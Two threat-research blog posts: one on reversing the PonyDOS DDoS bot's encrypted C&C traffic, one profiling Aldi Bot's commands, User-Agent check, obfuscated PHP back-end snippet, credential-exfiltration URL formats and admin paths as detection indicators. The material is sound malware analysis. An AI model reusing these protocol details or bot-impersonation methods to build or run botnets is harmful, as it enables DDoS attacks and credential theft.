Tag Archives : Bot March 2012

Not just a one-trick PonyDOS

By: jedwards -

Reversing the crypto used by the PonyDOS attack bot

This blog post is the third installment in our ongoing series of articles exploring the crypto systems commonly found in various DDoS malware families.  In previous articles we covered the reversing of the Armageddon and Khan DDoS bots; today we will cover a new malware family that we are calling Trojan.PonyDOS.  This malware family started showing up on our radar screens late in 2011.  Based on a static analysis of the malware, it seems that PonyDOS bot is yet another example of a bot that is exclusively focused on launching DDoS attacks against victim websites.  During dynamic analysis in a sandbox, we observed one PonyDOS sample phoning home to its C&C, and getting a response back; sadly, the communications were encrypted.  It turns out that PonyDOS uses a relatively complicated encryption mechanism to secure its communications, the reversing of which is discussed in detail in the linked report below.  As described in this report, PonyDOS has quite a few tricks up its sleeve that are designed to make its communications resistant to casual attempts at breaking.

PonyDOS gets its named from the string PNYDOS00 that is embedded within the bot binaries; as discussed in the report, the bot includes this identifying string in the “phone home” messages it sends to its command & control (C&C) server.  In addition, some of the samples also like to install themselves into sub-directories named pny within the infected user’s Application Data directory for example, as the file:

C:Documents and Settings$USERNAMEApplication Datapnypnd.exe

We reversed the malware’s crypto in order to gain a better insight into its behavior.  A complete analysis of the crypto system used by PonyDOS – including a Python implementation of a decryption/encryption module, is available here:

Report:  Not just a one-trick PonyDOS

Breaking the encryption used by our little PonyDOS was instrumental in understanding its various DDoS attack mechanisms, and developing defenses against them.  It turns out that PonyDOS supports the four following different types of attacks supported by PonyDOS:

  • A TCP Connection Flood;
  • An HTTP GET flood that does not attempt to read any response from the target web server;
  • An HTTP GET flood that does read responses from the target web server;
  • An HTTP POST flood;

Of course once we had broken the PonyDOS crypto, we started using our Python script (in encryption mode) to generate fake phone home messages in order to impersonate bots and trick the PonyDOS C&C servers into giving up their current attack orders.  This allows us to monitor PonyDOS botnets and observe attacks.  To date we’ve logged attacks against various target web sites hosted in the United States, Russian, and Luxembourg.  The PonyDOS botmasters seem to favor the GET flood attacks, with almost half (94 out of 192 logged events) of its attacks being specified as attack code 0x01 (GET without server read) or 0x02 (GET with server read).  TCP Connection Floods (code 0x00) and POST floods (code 0x03) were used less frequently as alternate attack types:

This completes the third installment in our ongoing series on breaking the crypto systems used by contemporary DDoS malware families.

DDoS Watch: Keeping an Eye on Aldi Bot

By: cwilson -

Background

The intention of this entry is to profile some elements of the Aldi Bot in order to provide value for the security operations community and malware research community.

Aldi Bot is a newer inexpensive DDoS bot that is growing in popularity. Recent data (September 30 2011) suggests that there are at least 50 distinct Aldi bot binaries that have been seen in the wild with 44 unique Command & Control points. We see the bot active in Russia, the Ukraine, the US, and Germany. While it has been stated that Aldi Bot won’t be developed further, the source code has leaked which makes it easy to find and use.

G-Data and others in the security community have discussed this bot in recent weeks. Of special interest to those concerned with availability, Aldi Bot offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy and the ability to download and execute malicious code of the attacker’s choice.

To underscore its attack capabilities, Aldi Bot was used to DDoS bka.de, the German federal police website in a demonstration video.

Figure 1 – Aldi Bot demonstration video launching DDoS attack on bka.de

click here to view full size image

All it takes is one bot such as Aldi Bot or other tool such as a Remote Access Trojan (RAT) to provide an attacker a handhold on the inside of an organization that can lead to a much larger security breach. It is now well-known that attacks involving the exfiltration of sensitive data typically start with one smaller compromise that is then leveraged for additional access. Additionally Aldi Bot steals passwords, and passwords are often re-used for convenience even though it is a dangerous practice. Without proper monitoring of system and network activity, such infected nodes can be long-lived and pose significant risk.

Thankfully in this case it seems that the Aldi Bot back-ends aren’t long lasting. Of the list of 41 back-ends that I obtained on September 30, 2011, it appears that only 13 of them were still online as of October 3, 2011.

Detection & uniqueness of threat

The author of Aldi Bot suggests that the bot will not be FUD (fully undetectable) and indeed Aldi Bot’s initial antivirus detection based on a September 22, 2011 analysis of the sample I analyzed (MD5: c903b63346c90d29b0fe711a68a747ba) features a 72.7% detection rate, with four vendors using a term similar to “Aldi Bot” such as “Abot” or “Albot”. The rest of the detections are generic.

http://www.virustotal.com/file-scan/report.html?id=dd29102bd9dc8e6599c38ea6dab9164bc5f072f2de0dc5706f120199c14b8949-1316731656

As antivirus detection can be an indicator that triggers an organizations Incident Response function, responders will have to dig a little deeper in many cases because generic alerts don’t provide much context as to the true nature of the threat. An example of this is a user seeking assistance with an Aldi Bot infection using the default filename “jetzt_kommt_aldi.exe” on September 4, 2011 on a Microsoft forum:

http://answers.microsoft.com/en-us/protect/forum/protect_scanning/jetztkommtaldiexe/27675ad5-45ba-4958-a6db-87b96a57164e?msgId=37b909f4-35f7-4d72-a0e3-a6704207c66b

While it has been speculated that Aldi Bot has borrowed from the Zeus banking Trojan source code release in early 2011, Aldi bot is written in Delphi with a PHP back-end, while Zeus is written in C++ with PHP on the back-end. The only obvious similarity between Zeus and Aldi Bot that I can see at first glance is that both of them tend to use a filename called gate.php on the web-based back-end as a “drop zone” to process stolen data.

Commands

Aldi bot’s commands are as follows:

  • ‘StartHTTP’ – starts an HTTP DDoS attack
  • ‘StartTCP’ – starts a TCP DDoS attack
  • ‘StopHTTPDDoS’ – stops an HTTP DDoS attack
  • ‘StopTCPDDoS’ – stops a TCP DDoS attack
  • ‘StopDDoS’ – apparently stops all DDoS attacks
  • ‘DownloadEx’ – download and execute other code (malware)
  • ‘CreateSocks’ – creates a SOCKS5 proxy
  • ‘StealData’ – trigger password stealing functionality
  • ‘Update’ – updates the bot

Custom User-Agent gets the goods

A potentially useful tidbit of information was found while reverse engineering the bot stub. While looking at an InternetOpenA API call associated with outbound activity, I noticed that a custom User-Agent “Aldi Bot FTW! :D” is used. It should be trivial to monitor for the presence of this string on the network.

push 10h ; dwFlags
push offset szProxyBypass ; lpszProxyBypass
push offset szProxyBypass ; lpszProxy
push 0 ; dwAccessType
push offset aAldiBotFtwD ; "Aldi Bot FTW! :D"
call InternetOpenA

If the wrong User-Agent is sent, then the back-end will not respond. On the wire a request to gate.php from an infected host looks similar to this (values are obscured for security)

Figure 2 – infected host reaching out to back-end at initial infection time

Click here to view full size image

Once the source code for Aldi Bot was obtained, it was easy to find this function:

Figure 3 – Delphi source code indicates custom User-Agent

Click here to view full size iamge

The back-end code that performs this checking was found with a datestamp from August 27, 2011 (the initial announcement for Aldi bot itself was apparently made one day later on an underground forum on August 28, 2011). The PHP code that performs the User-Agent checking is as follows:
function dnSOIAN0EWrU($XbJ41W11sYuW){
$XbJ41W11sYuW=str_replace(' ','',$XbJ41W11sYuW);
$XbJ41W11sYuW=str_replace('x','',$XbJ41W11sYuW);
$XbJ41W11sYPW=pack('H*',$XbJ41W11sYuW);
return $XbJ41W11sYPW;
}
$_SERVER['HTTP_USER_AGENT']!=base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157
625c62585943514632514d3d3',-48))))) ? exit(): '';

While decoding what’s going on here would be an interesting exercise, it’s easier just to see what’s happening with a slight modification to echo the expected User-Agent string:
$ua = base64_decode(strrev(dnSOIAN0EWrU(strrev(substr('94320157587b6163524342633157
625c62585943514632514d3d3',-48)))));
echo "Expected User-Agent: [", $ua, "]";

Running the PHP code then displays the expected string:

$ php -f aldi.php
Expected User-Agent: [Aldi Bot FTW! :D]

Analyzing back-end functions and detecting Aldi Bot on the wire

Outbound traffic to the back-end “drop zone” will use an HTTP GET string that looks similar to this:

/gate.php?hwid=&pc=&localip=&winver=

The value for the hwid parameter is uniquely calculated based on the systems hardware. The pc parameter is the PC’s name. The localip parameter is the local IP address of the system and winver is the version of windows installed, with x32 or x64 appended to match a 32 or 64 bit architecture.

When stolen data (only passwords at this time) is exfiltrated, a ‘&steal=’ parameter will be used in the URL that will also include the hwid value as such:
/gate.php?hwid=&steal=
The value passed in the steal parameter will be the type of credential and then the actual password values stolen from the system in the format of URL|User|Pass. Here is the back-end code responsible for storing the stolen credentials:

Figure 4 – PHP code handling stolen credentials

Click here to view full size image

A quick google query as of 10/3/2011 with elements from the gate.php string reveals two obvious infections (both reported for takedown) – one Windows 7 and one Windows XP:

http://<REMOVED>/b0ts4ev3ryb0dy/gate.php/gate.php?hwid=287389320&pc=%EE%E9%EB%EC-PC&localip=192.168.123.100&winver=Windows%207%20Professional%20×32.

http://<REMOVED>.ru/gate.php/gate.php?hwid=2001606274&pc=HOME-OFF-D5F0AC&localip=192.168.102.23&winver=Windows%20XP%20Professional%20×32.

The corresponding PHP back-end code:
//GET
$hwid = safe_xss($_GET['hwid']);
$localip = safe_xss($_GET['localip']);
$pc = safe_xss($_GET['pc']);
$winver = safe_xss($_GET['winver']);

This screenshot of bot statistics from one C&C shows that there were 239 bots online at one point, however only 8 bots were active, making this particular instance of the Aldi botnet very small. This could be due to reasonably good antivirus detection of the bot. The pie chart looks incorrect, however stats indicate that the Netherlands experienced the highest infection rate at 57.7% followed by the US with 10.5%.

Figure 5 – bot stats found on one C&C

Click here to view full size image

While the Aldi Bot source code has since been obtained, at first we only had a binary copy. In that case, the Interactive Delphi Reconstructor (IDR) does a pretty nice analysis job. IDR worked better than IDA or DeDe when working with Aldi Bot.

Figure 6 – IDR analysis of back-end traffic generation

Click here to view full size image

The default names of other Aldi bot back-end webapp components of interest (useful for network monitoring or probing on a C&C) include:
admin/inc
admin/inc/config.php
admin/inc/sess.php
admin/functions.php
admin/login.php
admin/pie.php
admin/index.php
admin/downlogs/
admin/img/aldi.gif
admin/js
admin/uploads/
geoip.php
index.php?id=stats
index.php?id=bots
index.php?id=bots&p=0
index.php?id=tasks
index.php?id=logs
index.php?id=upload
index.php?id=showlogs
index.php?logout

In addition to getting some value from watching for these patterns on the network, a review of back-ends indicates that sometimes certain folders such as admin/inc have directory indexing enabled which makes for an obvious C&C fingerprint.

Other indicators may include the following strings that have been seen in at least one Aldi Bot server-side install:

  • “Aldi Bot – installed by till7”
  • “StealData!” (from a misconfigured server)

The back-end login page looks like this:

Download and Execute in practice

As an example of the possible use for the “DownloadEx” function, a bit of poking at some active Aldi Bot campaign reveals the following:

1) Installation of yet another DDoS bot called Infinity Bot that has HTTP, ICMP, and TCP flooding capabilities.

2) Execution of the dScriptSt4r Anti-Virus Deleter, a simple batch file that tries to disable as many anti-virus applications as possible

3) Secure-Soft Stealer 5.20 that’s designed to steal credentials from the following applications:

  1. Trillian, Pidgin, Vitalwerks dynamic update client, DynDNS updater client, Steam, Opera, Firefox, Safari, jDownloader, Outlook, eMule, BulletProof FTP, Flash FXP, Miranda, Windows key, FileZilla, SmartFTP, MSN, ICQ, CoreFTP, and perhaps others.

Aldi Bot is just another in a long line of DDoS tools, however its inexpensive nature seems to have made it quickly popular. Underground forum posts praise its ability to perform effective DDoS attacks, which may have also contributed to the increase in popularity.

Figure 8 – Aldi Bot graphic from the back-end kit

References:

G Data: Botnets on discount:

http://blog.gdatasoftware.com/blog/article/botnets-on-discount.html

H-Online: Malware for everyone – Aldi Bot at a discount price

http://www.h-online.com/security/news/item/Malware-for-everyone-Aldi-Bot-at-a-discount-price-1346594.html

Aldi Bot – bka.de DDoS video:

http://www.youtube.com/watch?v=UskKFTFVLyI

Thanks to Arbor’s ASERT Team, Damballa and other anonymous contributors for additional data used in this analysis.